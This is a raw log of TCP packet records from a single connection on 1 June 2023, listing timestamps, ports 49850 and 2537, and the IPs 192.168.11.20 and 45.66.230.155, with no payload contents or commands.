Jun 1, 2023 22:36:40.874480009 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.875019073 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.875087023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.875230074 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.876200914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.876264095 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.876463890 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.876976013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.877039909 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.877176046 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.877895117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.877965927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.878236055 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.879038095 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.879116058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.879435062 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.880110979 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.880217075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.880448103 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.880981922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.881046057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.881269932 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.881985903 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.882050037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.882273912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.882827997 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.882889986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.883033991 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.883589983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.883652925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.883769989 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.884577036 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.884640932 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.884779930 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.885513067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.885556936 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.885744095 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.886185884 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.886229038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.886435032 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.887065887 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.887109995 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.887300014 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.887880087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.887923002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.888128996 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.888782024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.888844013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.889552116 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.889687061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.889750957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.889944077 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.890605927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.890644073 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.890810013 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.891082048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.891133070 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.891174078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.891290903 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.891469002 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.892090082 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.892133951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.892160892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.892431974 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.893018007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.893059969 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.893085003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.893340111 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.893340111 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.893662930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.893706083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.893733025 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.893862963 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.894104004 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.894232035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.894253016 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.894265890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.894423008 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.894792080 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.894831896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.894859076 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.895032883 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.895586014 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.895631075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.895704985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.895822048 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.896238089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.896394014 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.896420956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.896524906 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.896703005 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.897017002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.897183895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.897195101 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.897228956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.897409916 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.897778034 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.897852898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.897902012 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.898155928 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.898650885 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.898761988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.898813963 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.898827076 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.898889065 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.899072886 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.899279118 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.899324894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.899445057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.899460077 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.899718046 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.899838924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.899864912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.899905920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.899919033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.900026083 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.900655985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.900763988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.900810003 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.900823116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.900835991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.901015997 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.901551008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.901662111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.901716948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.901729107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.901755095 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.901925087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.902467966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.902576923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.902628899 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.902641058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.902870893 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.903412104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.903522968 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.903573990 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.903585911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.903645992 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.903887987 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.904287100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.904397011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.904448986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.904460907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.904500961 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.904783964 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.905211926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.905318975 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.905376911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.905389071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.905513048 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.905697107 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.906002998 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.906119108 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.906177044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.906188965 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.906332016 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.906516075 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.906852961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.906960964 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907016039 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907027960 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907037973 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.907183886 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.907587051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907706976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907759905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907772064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.907922029 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.908103943 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.908376932 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.908490896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.908545017 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.908556938 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.908616066 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.908690929 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.909450054 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.909470081 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.909513950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.909569025 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.909636021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.909656048 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.909696102 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.909847021 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.910326958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.910438061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.910490990 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.910502911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.910653114 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.910832882 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.911123037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.911241055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.911277056 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.911302090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.911314011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.911324978 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.911462069 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.911645889 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.911958933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.912080050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.912131071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.912142992 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.912199974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.912245035 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.912353992 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.912429094 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.912621975 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.912925005 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913043022 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913100958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913113117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913124084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913135052 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913285017 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.913285017 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.913467884 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.913813114 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913923025 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913984060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.913995981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914006948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914017916 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914231062 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.914231062 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.914412022 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.914633989 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914753914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914808035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914819002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914829969 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914841890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.914885998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.915110111 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.915402889 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.915524006 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.915581942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.915594101 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.915605068 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.915644884 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.915771008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916047096 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.916482925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916590929 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916651011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916666031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916677952 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916688919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916692019 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.916811943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.916928053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.916928053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.917025089 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.917277098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917375088 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917424917 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917551994 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.917682886 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917805910 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917860031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917929888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917946100 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.917983055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.917994022 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.918092012 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918103933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918134928 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.918349981 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.918560982 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918680906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918737888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918750048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918761015 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918777943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918788910 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.918818951 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.918867111 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.918867111 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.919457912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919569016 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919603109 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.919630051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919641972 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919656038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919672966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919683933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.919754982 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.919754982 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.919852018 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.920267105 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920372963 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920433998 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920445919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920456886 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920476913 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920488119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920499086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.920591116 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.920592070 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.920592070 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.920783997 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.921257973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921366930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921426058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921441078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921452045 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921463966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921492100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921549082 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.921591043 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.921591043 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.921832085 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.921832085 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.922169924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922276974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922333002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922344923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922355890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922405005 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922457933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922468901 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.922480106 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923065901 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.923180103 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923253059 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923306942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923317909 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923455000 CEST	49850	2537	192.168.11.20	45.66.230.155
